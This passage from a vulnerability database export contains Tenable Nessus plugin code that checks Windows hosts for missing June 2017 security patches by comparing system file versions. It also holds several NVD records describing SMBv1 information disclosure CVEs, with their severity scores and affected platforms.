script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nkbs = make_list(\n '3197835',\n '4018271',\n '4018466',\n '4019204',\n '4022747',\n '4024323',\n '4024402',\n '4025218'\n);\n\nbulletin = 'MS17-06';\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\nif ('XP' >< productname)\n{\n if (\n # Windows XP SP3 (x86)\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"win32k.sys\", version:\"5.1.2600.7258\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"query.dll\", version:\"5.1.2600.7273\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"olecnv32.dll\", version:\"5.1.2600.7285\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"rasmxs.dll\", version:\"5.1.2600.7272\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024323\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"httpext.dll\", version:\"6.0.2600.7150\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7238\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"mshtml.dll\", version:\"8.0.6001.23942\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"gpkcsp.dll\", version:\"5.1.2600.7264\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\", arch:\"x86\") ||\n\n # Windows XP SP2 (x64)\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"win32k.sys\", version:\"5.2.3790.6080\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"query.dll\", version:\"5.2.3790.6100\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"olecnv32.dll\", version:\"5.2.3790.6113\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"rasmxs.dll\", version:\"5.2.3790.6099\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024323\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"httpext.dll\", version:\"6.0.3790.5955\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6051\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"mshtml.dll\", version:\"8.0.6001.23942\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"gpkcsp.dll\", version:\"5.2.3790.6093\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\", arch:\"x64\")\n ) vuln = TRUE;\n}\nelse if ('2003' >< productname)\n{\n if (\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"win32k.sys\", version:\"5.2.3790.6080\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"query.dll\", version:\"5.2.3790.6100\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"olecnv32.dll\", version:\"5.2.3790.6113\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"rasmxs.dll\", version:\"5.2.3790.6099\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024323\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"httpext.dll\", version:\"6.0.3790.5955\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6051\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"gpkcsp.dll\", version:\"5.2.3790.6093\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\")\n ) vuln = TRUE;\n}\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T16:26:45", "description": "The remote Windows 8 host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in Windows OLE due to improper validation of user-supplied input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted file or email message, to execute arbitrary code in the context of the current user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Windows 8 June 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0222", "CVE-2017-0267", "CVE-2017-8464", "CVE-2017-8487", "CVE-2017-8543"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_WINDOWS8.NASL", "href": "https://www.tenable.com/plugins/nessus/100788", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100788);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-8464\",\n \"CVE-2017-8487\",\n \"CVE-2017-8543\"\n );\n script_bugtraq_id(\n 98127,\n 98259,\n 98818,\n 98824,\n 99013\n );\n script_xref(name:\"MSKB\", value:\"4022839\");\n script_xref(name:\"MSKB\", value:\"4019623\");\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSFT\", value:\"MS17-4022839\");\n script_xref(name:\"MSFT\", value:\"MS17-4019623\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Windows 8 June 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 8 host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in Windows\n OLE due to improper validation of user-supplied input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website or\n to open a specially crafted file or email message, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4012598/title\");\n # https://support.microsoft.com/en-us/help/4012583/ms17-011-and-ms17-013-description-of-the-security-update-for-microsoft\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba79a274\");\n # https://support.microsoft.com/en-ca/help/4022839/description-of-the-security-update-for-windows-8-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d15161da\");\n # http://www.catalog.update.microsoft.com/Search.aspx?q=KB4019623\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00067ec3\");\n # https://support.microsoft.com/en-us/help/4018271/cumulative-security-update-for-internet-explorer-may-9-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5470f743\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released emergency patches for Windows 8. Apply security\nupdates KB4022839, KB4019623, and KB4018271\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-06';\nkbs = make_list(\n \"4022839\",\n \"4019623\",\n \"4018271\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Server\" >< productname)\n audit(AUDIT_OS_NOT, \"Windows 8\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 4022839\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"shell32.dll\", version:\"6.2.9200.22164\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022839\")\n ||\n # 4019623\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019623\")\n ||\n # 4018271\n # x86\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"hlink.dll\", version:\"6.0.6002.22092\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\")\n ||\n # x64\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"hlink.dll\", version:\"6.0.6002.22104\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\")\n\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:51:25", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0267", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0267", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0267", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:27", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0268", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0268", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0268", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:29", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0270", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0270", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:29", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0271", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0271", "href": 